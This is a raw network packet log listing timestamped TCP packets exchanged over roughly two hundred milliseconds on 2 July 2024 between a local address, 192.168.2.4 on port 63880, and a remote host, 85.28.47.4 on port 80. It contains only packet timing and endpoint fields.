                                            Jul 2, 2024 08:26:28.576447964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576461077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576472044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576488018 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576494932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576494932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576507092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576509953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576519012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.576524973 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576543093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.576560974 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577064991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577076912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577089071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577100992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577110052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577114105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577125072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577128887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577145100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577151060 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577157021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577168941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577188015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577560902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577573061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577584028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577595949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577605963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577608109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577620029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577630043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577631950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577647924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577656031 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577661991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577666998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577675104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577687025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.577692032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577708960 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.577733040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578299046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578310966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578322887 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578337908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578349113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578350067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578360081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578361988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578373909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578385115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578387976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578397036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578401089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578416109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578427076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578428030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578438044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578449011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578453064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578461885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578470945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578474045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.578495026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.578517914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579267979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579279900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579291105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579302073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579313040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579315901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579324961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579333067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579335928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579348087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579355955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579360008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579369068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579372883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579384089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579396009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579396963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579407930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579418898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579421043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579437017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579438925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.579463959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.579488039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.580214977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580228090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580239058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580250025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580262899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580262899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.580272913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.580275059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580286026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580296993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580302954 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.580308914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580317020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.580321074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580332041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580337048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.580343008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580353975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580358028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.580365896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.580383062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.580396891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581075907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581088066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581099033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581118107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581124067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581130981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581141949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581146002 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581152916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581165075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581171036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581176996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581185102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581187963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581197977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581202030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581211090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581223011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581224918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581233978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581245899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581249952 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581257105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.581274986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581280947 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.581307888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.582075119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.582087994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.582098961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.582110882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.582122087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.582122087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.582133055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.582140923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.582163095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.582175970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.664505005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664537907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664550066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664572001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664582968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664608955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.664652109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.664729118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664740086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664752007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664763927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664777994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.664791107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.664810896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.664930105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.664975882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665079117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665091991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665103912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665116072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665123940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665128946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665148020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665154934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665162086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665162086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665189981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665210962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665371895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665414095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665498972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665510893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665522099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665533066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665544987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665549040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665556908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665568113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665571928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665579081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665586948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665590048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665602922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665608883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665615082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.665631056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.665652990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666182041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666193008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666204929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666215897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666227102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666229963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666238070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666249990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666246891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666269064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666269064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666282892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666290998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666295052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666307926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666316986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666321039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666331053 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666332006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666343927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666354895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.666357994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666372061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.666393995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667068958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667081118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667090893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667104959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667115927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667119026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667126894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667133093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667139053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667150021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667161942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667164087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667172909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667185068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667186022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667196989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667206049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667208910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667220116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667227983 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667232990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.667249918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667258024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667288065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.667995930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668006897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668018103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668030024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668041945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668046951 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.668052912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668059111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.668065071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668072939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.668076038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668088913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668100119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668107033 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.668112040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668124914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.668126106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668138027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668143988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.668149948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668162107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668173075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.668173075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.668194056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.668207884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669095993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669109106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669121027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669132948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669143915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669143915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669153929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669157028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669169903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669182062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669184923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669193029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669203997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669209003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669217110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669226885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669228077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669236898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669239998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669251919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669262886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669270992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669291973 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669306993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669796944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669810057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669820070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669831991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669843912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669846058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669856071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669871092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669889927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669920921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669934988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669946909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669959068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669962883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669970036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669981003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.669986963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.669991016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670001030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670005083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.670015097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670026064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670027971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.670037031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670047998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.670073986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.670761108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670773029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670783997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670795918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670805931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670813084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.670819044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670829058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.670830965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.670850039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.670876980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.753540993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753571987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753583908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753611088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.753633976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753643036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.753647089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753664970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753678083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753684998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.753684998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.753705025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.753915071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753926992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753940105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753951073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753952980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.753963947 CEST806388085.28.47.4192.168.2.4
